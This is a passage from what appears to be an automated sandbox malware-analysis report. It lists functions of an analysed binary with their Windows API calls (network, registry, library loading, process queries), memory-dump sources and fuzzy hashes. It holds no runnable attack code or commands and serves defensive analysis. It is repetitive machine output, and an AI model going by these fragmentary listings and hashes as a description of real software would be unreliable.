                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004F1181
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                              • String ID: DllGetClassObject
                                                                                                                                                                              • API String ID: 753597075-1075368562
                                                                                                                                                                              • Opcode ID: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                                                                                                                                              • Instruction ID: 36417bec39e57643088f3ff22c0e9180c0a1f2f3b90f6687828b719dc71d90d7
                                                                                                                                                                              • Opcode Fuzzy Hash: 8076bd471c13b951411ccdee5844508d2b6e5202704e9fef0f6b4be31fec67a3
                                                                                                                                                                              • Instruction Fuzzy Hash: 81418B71600208EFDB05CF55C984AAB7BB9EF48354F1480AAEB09DF225D7B9DD44CBA4
                                                                                                                                                                              Function 004F5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5A93
                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 004F5AAF
                                                                                                                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004F5AF5
                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005718F0,00000000), ref: 004F5B3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                                                                                              • Opcode ID: 1492575a877e4c0b9d89e826438f122fa9eba35631f85f1723ef5b231a160c47
                                                                                                                                                                              • Instruction ID: e130b0369a2f427a6ec13fa7741e861c40b61ea5f5965bfc9a0d720fa5f6f215
                                                                                                                                                                              • Opcode Fuzzy Hash: 1492575a877e4c0b9d89e826438f122fa9eba35631f85f1723ef5b231a160c47
                                                                                                                                                                              • Instruction Fuzzy Hash: 3441AF71608705AFDB109F24D884B6AB7E4EF88314F04465EFBA59B3D1D778A804CB6A
                                                                                                                                                                              Function 00510458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                                                                                                                                                • Part of subcall function 004B7F40: _memmove.LIBCMT ref: 004B7F8F
                                                                                                                                                                                • Part of subcall function 004BA2FB: _memmove.LIBCMT ref: 004BA33D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$BuffCharLower
                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                              • API String ID: 2411302734-567219261
                                                                                                                                                                              • Opcode ID: e198924583dbf0d783a9deb7ea2e59e206e2693affbd288585fd74da20568a8f
                                                                                                                                                                              • Instruction ID: 8f153bd4a2ba0b4c4da141c9767608cfa02d214cb18474d7b5430cc94944c937
                                                                                                                                                                              • Opcode Fuzzy Hash: e198924583dbf0d783a9deb7ea2e59e206e2693affbd288585fd74da20568a8f
                                                                                                                                                                              • Instruction Fuzzy Hash: 0831E434500609AFCF00EF59C840AEEBBB6FF14354B108A2EE422972D1DB75E985CF50
                                                                                                                                                                              Function 004EC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004EC684
                                                                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004EC697
                                                                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 004EC6C7
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$_memmove
                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                              • API String ID: 458670788-1403004172
                                                                                                                                                                              • Opcode ID: f5c79ba55a2fdfaafed52533c516b3a676ba6e21bd5275bbec14be33ded2eb29
                                                                                                                                                                              • Instruction ID: a6bf07e5a8dc0b60a1af7977dc15af940184e4939521d7a7822ab23b9a60cf6d
                                                                                                                                                                              • Opcode Fuzzy Hash: f5c79ba55a2fdfaafed52533c516b3a676ba6e21bd5275bbec14be33ded2eb29
                                                                                                                                                                              • Instruction Fuzzy Hash: 4421E471900144AEDB149B76C886EFFBB79DF55315F10451BF421E32E0DB7D4D0AA628
                                                                                                                                                                              Function 00504A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00504A86
                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00504AB6
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                                                                                                                                                • Part of subcall function 005056A9: GetLastError.KERNEL32(?,?,00504A2B,00000000,00000000,00000001), ref: 005056BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1951874230-3916222277
                                                                                                                                                                              • Opcode ID: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                                                                                                                                              • Instruction ID: f05dd4c942cbc71359a5f3061331a873a57061654382806d8f4fd3eb51f8bd44
                                                                                                                                                                              • Opcode Fuzzy Hash: 92487abb27da848cd850677aff8598f2cdac8ba8926989ad2e516668364ef396
                                                                                                                                                                              • Instruction Fuzzy Hash: 2221CFB5640208BFEB11DFA59C89EBFBAFDFB88744F10401AF605D2280EA749D059B74
                                                                                                                                                                              Function 004B38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0052454E
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • _memset.LIBCMT ref: 004B3965
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004B39B5
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                              • String ID: Line:
                                                                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                                                                              • Opcode ID: f25078e192f95fffea75109b0fba0bdd40d14e3cfafdfab95ecdf9e99f086203
                                                                                                                                                                              • Instruction ID: 3ae5d0a30d949020e42968ce22a0d4b12ca8ca4d54144ec5da6853e11dadd9f3
                                                                                                                                                                              • Opcode Fuzzy Hash: f25078e192f95fffea75109b0fba0bdd40d14e3cfafdfab95ecdf9e99f086203
                                                                                                                                                                              • Instruction Fuzzy Hash: 1231D5B1108340ABD721EF55DC45FDB7BE8AF54315F00451FF189821A1DB78AA8CEBAA
                                                                                                                                                                              Function 00518EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00518F69
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00518F70
                                                                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00518F85
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 00518F8D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                              • String ID: SysAnimate32
                                                                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                                                                              • Opcode ID: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                                                                                                                                              • Instruction ID: 6c69461c21db6b75df431851a80f8d664bbfd13a0dcd1fd919c69f47df88928c
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac7d2c5eac7a44d62e7cc9adf10d64fb52ab91f9b45efb7c869d5d1ace32e36
                                                                                                                                                                              • Instruction Fuzzy Hash: F3219D71600205AFFF204E64EC85EFB3BAEFB59364F104629FA2497190DB71DC92A760
                                                                                                                                                                              Function 004FE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 004FE392
                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 004FE3E6
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FE3FF
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0054DBF0), ref: 004FE43D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                                                                              • Opcode ID: 2348f7ca85a3633fecec59ec2f30a8b521cbfc117d535cb817d44b90e5f8d010
                                                                                                                                                                              • Instruction ID: aa709d2c785cebab923b0862c94293c1ca4177611192ac149142d575b559ec63
                                                                                                                                                                              • Opcode Fuzzy Hash: 2348f7ca85a3633fecec59ec2f30a8b521cbfc117d535cb817d44b90e5f8d010
                                                                                                                                                                              • Instruction Fuzzy Hash: D1217F35A40108AFCB10EBA5D885EEEBBB8EF59704B10406EF509D7351D775DA05DB60
                                                                                                                                                                              Function 004ED7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                                • Part of subcall function 004ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                                                                                                                                                • Part of subcall function 004ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                                                                                                                                                • Part of subcall function 004ED623: GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                                                                                                                                                • Part of subcall function 004ED623: AttachThreadInput.USER32(00000000), ref: 004ED661
                                                                                                                                                                              • GetFocus.USER32 ref: 004ED7FB
                                                                                                                                                                                • Part of subcall function 004ED66C: GetParent.USER32(?), ref: 004ED67A
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004ED844
                                                                                                                                                                              • EnumChildWindows.USER32(?,004ED8BA), ref: 004ED86C
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004ED886
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                              • API String ID: 1941087503-1110647743
                                                                                                                                                                              • Opcode ID: 81bfd54bc1312ebea3d1e25999b07a08ff4580b821e47396f26cfae958a5331d
                                                                                                                                                                              • Instruction ID: 672c91af6b99e0f8c6f757d6da6e497e659e69b4497a94da81da966030d07919
                                                                                                                                                                              • Opcode Fuzzy Hash: 81bfd54bc1312ebea3d1e25999b07a08ff4580b821e47396f26cfae958a5331d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F11E4719002056BDB117F629C86FEA3779AF44709F0040BAFE19AA186CBB899459B74
                                                                                                                                                                              Function 004D8724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __lock.LIBCMT ref: 004D8768
                                                                                                                                                                                • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                                                                                                                                                • Part of subcall function 004D8984: EnterCriticalSection.KERNEL32(004D0127,?,004D876D,0000000D), ref: 004D89AF
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(DC840F00), ref: 004D8775
                                                                                                                                                                              • __lock.LIBCMT ref: 004D8789
                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 004D87A7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                              • String ID: PS
                                                                                                                                                                              • API String ID: 1687444384-489029678
                                                                                                                                                                              • Opcode ID: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                                                                                                                                              • Instruction ID: 598087e672e9286ecc6257aa7b4fd0894fe1ffc91ebba3253e6b131da27bf4d8
                                                                                                                                                                              • Opcode Fuzzy Hash: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                                                                                                                                              • Instruction Fuzzy Hash: BF015B71401B009ED760AF66D81675ABBF0BF54329F20890FE499973A0DBB8A644CF05
                                                                                                                                                                              Function 00511836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005118E4
                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00511917
                                                                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00511A3A
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00511AB0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2364364464-0
                                                                                                                                                                              • Opcode ID: 3d7aff12daab0bc37e1d3f1eebd79ad5e1864f935bff505c9768f7aeb9685ebf
                                                                                                                                                                              • Instruction ID: 746d936ccc06fb4a327df516f2205442cf434aa423c7b1a55cdfc548e8d41e6d
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d7aff12daab0bc37e1d3f1eebd79ad5e1864f935bff505c9768f7aeb9685ebf
                                                                                                                                                                              • Instruction Fuzzy Hash: F2818474A50204ABDF149F65C885FADBBF5BF44724F14805EF905AF382D7B8E9408B98
                                                                                                                                                                              Function 00510579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005105DF
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0051066E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0051068C
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 005106D2
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 005106EC
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 327935632-0
                                                                                                                                                                              • Opcode ID: daa2cc96b88e04e671ea1edba38c232f57382a5eed41fe9afa8f18e4a68231ee
                                                                                                                                                                              • Instruction ID: 0a947df72abcbd8d9afc8049353227e915023ab15842b29dde0f778ac2771222
                                                                                                                                                                              • Opcode Fuzzy Hash: daa2cc96b88e04e671ea1edba38c232f57382a5eed41fe9afa8f18e4a68231ee
                                                                                                                                                                              • Instruction Fuzzy Hash: 6C518E75A002059FDB00EFA8C4909EDFBB5FF58314B1480AAE945AB391DB74ED85CBA4
                                                                                                                                                                              Function 00512D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512DE0
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512E1F
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00512E66
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00512E92
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00512E9F
                                                                                                                                                                              Memory Dump Source
